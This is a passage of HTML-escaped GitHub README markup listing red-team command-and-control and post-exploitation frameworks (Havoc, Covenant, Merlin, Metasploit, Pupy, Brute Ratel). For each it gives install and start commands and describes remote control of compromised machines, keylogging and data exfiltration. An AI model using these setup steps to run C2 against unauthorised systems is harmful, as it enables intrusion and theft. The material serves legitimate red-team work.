highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install build-essential\nsudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt update\nsudo apt install python3.10 python3.10-dev\"\u003e\u003cpre\u003esudo apt install build-essential\nsudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt update\nsudo apt install python3.10 python3.10-dev\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eBuild + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/HavocFramework/Havoc.git\ncd Havoc/Client\nmake \n./Havoc \"\u003e\u003cpre\u003egit clone https://github.com/HavocFramework/Havoc.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Havoc/Client\nmake \n./Havoc \u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePre-requisites:\u003c/strong\u003e (Ubuntu 20.04 / 22.04)\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"cd Havoc/Teamserver\ngo mod download golang.org/x/sys \ngo mod download github.com/ugorji/go\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Havoc/Teamserver\ngo mod download golang.org/x/sys \ngo mod download github.com/ugorji/go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eBuild + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"cd Teamserver\n./Install.sh\nmake\n./teamserver -h\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Teamserver\n./Install.sh\nmake\n./teamserver -h\u003c/pre\u003e\u003c/div\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eRun the teamserver\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug\"\u003e\u003cpre\u003esudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eFull install, build and run instructions on the \u003ca href=\"https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD\"\u003ewiki\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/cobbr/Covenant\"\u003eCovenant\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-covenant\" class=\"anchor\" aria-label=\"Permalink: 🔙Covenant\" href=\"#covenant\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 
0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCovenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Dotnet Core)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download dotnet core for your platform from \u003ca href=\"https://dotnet.microsoft.com/download/dotnet-core/3.1\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eAfter starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\"\u003e\u003cpre\u003egit clone --recurse-submodules https://github.com/cobbr/Covenant\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Covenant/Covenant\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Dotnet Core)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"~/Covenant/Covenant \u0026gt; dotnet run\nwarn: Microsoft.EntityFrameworkCore.Model.Validation[10400]\n Sensitive data logging is enabled. 
Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.\nWARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.\nCovenant has started! Navigate to https://127.0.0.1:7443 in a browser\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e dotnet run\nwarn: Microsoft.EntityFrameworkCore.Model.Validation[10400]\n Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.\nWARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.\nCovenant has started\u003cspan class=\"pl-k\"\u003e!\u003c/span\u003e Navigate to https://127.0.0.1:7443 \u003cspan class=\"pl-k\"\u003ein\u003c/span\u003e a browser\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Docker)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Build the docker image:\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\n~/Covenant/Covenant \u0026gt; docker build -t covenant .\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Build the docker image:\u003c/span\u003e\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Covenant/Covenant\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker build -t covenant \u003cspan 
class=\"pl-c1\"\u003e.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Docker)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run Covenant within the Docker container\n~/Covenant/Covenant \u0026gt; docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v \u0026lt;/absolute/path/to/Covenant/Covenant/Data\u0026gt;:/app/Data covenant\n\n# Stop the container\n~/Covenant/Covenant \u0026gt; docker stop covenant\n\n# Restart Covenant interactively\n~/Covenant/Covenant \u0026gt; docker start covenant -ai\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run Covenant within the Docker container\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003e/absolute/path/to/Covenant/Covenant/Data\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e:/app/Data covenant\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Stop the container\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker stop covenant\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Restart Covenant interactively\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker start covenant -ai\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation and startup instructions can be found on the wiki \u003ca 
href=\"https://github.com/cobbr/Covenant/wiki/Installation-And-Startup\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage from \u003ca href=\"https://github.com/cobbr/Covenant\"\u003ehttps://github.com/cobbr/Covenant\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Ne0nd0g/merlin\"\u003eMerlin\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-merlin\" class=\"anchor\" aria-label=\"Permalink: 🔙Merlin\" href=\"#merlin\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMerlin is an open-source post-exploitation framework that is designed to be used after an initial compromise of a system.\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003eIt is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eDownload the latest compiled version of Merlin Server from the \u003ca href=\"https://github.com/Ne0nd0g/merlin/releases\"\u003ereleases\u003c/a\u003e section\u003c/li\u003e\n\u003cli\u003eExtract the files with 7zip using the x function. The password is: merlin\u003c/li\u003e\n\u003cli\u003eStart Merlin\u003c/li\u003e\n\u003cli\u003eConfigure a \u003ca href=\"https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html\" rel=\"nofollow\"\u003elistener\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeploy an agent. See \u003ca href=\"https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html\" rel=\"nofollow\"\u003eAgent Execution Quick Start Guide\u003c/a\u003e for examples\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"mkdir /opt/merlin;cd /opt/merlin\nwget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z\n7z x merlinServer-Linux-x64.7z\nsudo ./merlinServer-Linux-x64\"\u003e\u003cpre\u003emkdir /opt/merlin\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e /opt/merlin\nwget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z\n7z x merlinServer-Linux-x64.7z\nsudo ./merlinServer-Linux-x64\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eEnsure the Merlin server is running with a configured listener\u003c/li\u003e\n\u003cli\u003eDownload and deploy an agent to the 
victim\u003c/li\u003e\n\u003cli\u003eExecute agent\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003eFor detailed usage information see the official Merlin \u003ca href=\"https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html\" rel=\"nofollow\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage from \u003ca href=\"https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks\" rel=\"nofollow\"\u003ehttps://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/rapid7/metasploit-framework\"\u003eMetasploit Framework\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-metasploit-framework\" class=\"anchor\" aria-label=\"Permalink: 🔙Metasploit Framework\" href=\"#metasploit-framework\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 
0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMetasploit is an open-source framework for developing, testing, and using exploit code.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Installer)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \u0026gt; msfinstall \u0026amp;\u0026amp; \\\n chmod 755 msfinstall \u0026amp;\u0026amp; \\\n ./msfinstall\"\u003e\u003cpre\u003ecurl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e msfinstall \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e \\\n chmod 755 msfinstall \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e \\\n ./msfinstall\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"/opt/metasploit-framework/bin/msfconsole\"\u003e\u003cpre\u003e/opt/metasploit-framework/bin/msfconsole\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation instructions can be found on the official \u003ca 
href=\"https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html\" rel=\"nofollow\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.rapid7.com/blog/tag/metasploit/\" rel=\"nofollow\"\u003eRapid7 Metasploit blogs\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp\" rel=\"nofollow\"\u003eCheat sheet graphic\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://github.com/security-cheatsheet/metasploit-cheat-sheet\"\u003eNice command list\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://goacademy.io/how-to-install-metasploit-on-kali-linux/\" rel=\"nofollow\"\u003ehttps://goacademy.io/how-to-install-metasploit-on-kali-linux/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/n1nj4sec/pupy\"\u003ePupy\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pupy\" class=\"anchor\" aria-label=\"Permalink: 🔙Pupy\" href=\"#pupy\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 
0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv\ngit clone --recursive https://github.com/n1nj4sec/pupy\ncd pupy\npython create-workspace.py -DG pupyw\"\u003e\u003cpre\u003esudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv\ngit clone --recursive https://github.com/n1nj4sec/pupy\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e pupy\npython create-workspace.py -DG pupyw\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eRoll fix to fix the error:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo pip2 install rpyc==3.4.4\"\u003e\u003cpre\u003esudo pip2 install rpyc==3.4.4\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eStart:\u003c/p\u003e\n\u003cdiv class=\"highlight 
highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"export PATH=$PATH:~/.local/bin; pupysh\npupyws/bin/pupysh\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003eexport\u003c/span\u003e PATH=\u003cspan class=\"pl-smi\"\u003e$PATH\u003c/span\u003e:\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/.local/bin\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pupysh\npupyws/bin/pupysh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eGit install instructions used from \u003ca href=\"https://kalitut.com/how-to-install-pupy/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Docker)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFor detailed docker and pupy installation instructions see the \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Installation\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Get help page for any builtin commands with -h\n\u0026gt;\u0026gt; sessions -h\n\u0026gt;\u0026gt; jobs -h\n\u0026gt;\u0026gt; run -h\n\n# Interact with session 1\n\u0026gt;\u0026gt; sessions -i 1\n\n# Run local command 'ls'\n\u0026gt;\u0026gt; !ls\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get help page for any builtin commands with -h\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e sessions -h\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ejobs\u003c/span\u003e -h\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e run -h\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e 
Interact with session 1\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e sessions -i 1\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run local command 'ls'\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e!\u003c/span\u003els\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found on the \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Basic-Usage\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe wiki contains good \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation\"\u003epost exploitation information\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Screenshots\"\u003ehttps://github.com/n1nj4sec/pupy/wiki/Screenshots\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://bruteratel.com/\" rel=\"nofollow\"\u003eBrute Ratel\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-brute-ratel\" class=\"anchor\" aria-label=\"Permalink: 🔙Brute Ratel\" href=\"#brute-ratel\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 
0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBruteRatel is a great command and control (C4) framework created by \u003ca href=\"https://twitter.com/NinjaParanoid\" rel=\"nofollow\"\u003e@NinjaParanoid\u003c/a\u003e. The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe client and server communicate with each other using various communication 